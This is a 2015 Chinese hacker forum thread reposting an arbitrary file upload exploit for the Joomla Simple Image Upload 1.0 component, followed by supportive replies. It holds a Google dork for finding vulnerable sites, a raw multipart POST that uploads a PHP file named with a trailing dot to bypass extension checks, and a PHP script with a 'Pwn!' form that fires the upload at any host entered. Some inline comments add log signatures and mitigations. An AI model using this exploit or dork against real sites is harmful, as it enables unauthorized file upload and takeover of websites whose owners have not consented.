90_ 发表于 2015-6-26 19:32:58

Joomla SimpleImageUpload任意文件上传

# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
# Google Dork: inurl:option=com_simpleimageupload
# Date: 23.06.2015
# Version: 1.0
# Tested on: MsWin32
 
# The vulnerability is the same as the com_media vulnerability
 
# Live Request :
 
POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1
 
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.unhonker.com/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------247062787817068
 
 
-----------------------------247062787817068\r\n
Content-Disposition: form-data; name="Filedata"; filename="L0v3.php."\r\n
Content-Type: application/x-php\r\n
\r\n
0wn3d ! ;)\r\n
-----------------------------247062787817068\r\n
Content-Disposition: form-data; name="return-url"\r\n
\r\n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
-----------------------------247062787817068--\r\n
 
 
# Exploit :
 
<?php
// Proof-of-concept page for the Simple Image Upload 1.0 arbitrary file upload
// described above. It prints a one-field HTML form and, when that form is
// posted back, sends a single multipart POST to the component's upload task
// on the host typed into the form, then prints the server's reply.
//
// Defender notes (review):
//  - Log signature: POST requests to index.php with
//    option=com_simpleimageupload (view=upload or task=upload.upload) whose
//    multipart part "Filedata" carries a filename ending in ".php.".
//  - The write-up reports the file landing at images/L0v3.php after being sent
//    as "L0v3.php."; presumably the extension check sees the trailing dot and
//    the filesystem drops it on write (tested on Windows only) - confirm.
//  - Mitigations: remove or update the component, allow-list extensions only
//    after stripping trailing dots/spaces, and deny script execution in the
//    images/ upload directory at the web-server level.
 
// Input form: posts back to the same URL ("#") with a single "target" field.
echo '<form action="#"  method="post" enctype="multipart/form-data">
<input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" />
</form>';
 
 
// Only act when the form above has been submitted.
if($_POST) {
     
    // Host name taken straight from the form; it is not validated before
    // being concatenated into the request URL below.
    $target = $_POST['target'];
 
// Marker text; the same string appears as the file body in the captured request.
$file = "0wn3d ! ;)";
// Extra header lines handed to cURL through CURLOPT_HTTPHEADER further down.
$header = array("Content-Type: application/x-php",
"Content-Disposition: form-data; name=\"Filedata\"; file=\"L0v3.php.\"");
 
// Plain-HTTP request to the component's upload task on the supplied host.
$ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component");
curl_setopt($ch, CURLOPT_POST, true);
// Browser-like User-Agent string.
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36");
// Form fields: "Filedata" and "return-url". The return-url value is the same
// base64 string as in the captured request (it appears to encode the upload
// view's relative URL - confirm by decoding).
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",));
// Return the response body from curl_exec() instead of writing it to output.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$result = curl_exec($ch);
curl_close($ch);
// NOTE(review): the remote response is printed without escaping, so whatever
// HTML/JS the contacted server returns is rendered in the operator's browser.
print "$result";
 
// No POST data: stop after the form has been emitted.
} else { die(); }
?>
 
 
# Path of File : 127.0.0.1/images/L0v3.php
# Sh00t to Mr_AnarShi-T;

fireworld 发表于 2015-6-26 22:19:22

支持中国红客联盟(ihonker.org)

cl476874045 发表于 2015-6-27 11:53:04

加油!干倒冰儿和酒仙!

小龙 发表于 2015-6-27 14:16:41

加油!干倒冰儿和酒仙!

ruguoruo 发表于 2015-6-27 15:30:26

感谢楼主的分享~

ruguoruo 发表于 2015-6-27 18:19:03

支持中国红客联盟(ihonker.org)

云游者 发表于 2015-6-28 19:47:40

感谢楼主的分享~

54hacker 发表于 2015-6-29 11:35:02

学习学习技术,加油!

H.U.C-麦麦 发表于 2015-6-29 17:14:43

支持中国红客联盟(ihonker.org)

ayang 发表于 2015-6-30 00:42:24

支持中国红客联盟(ihonker.org)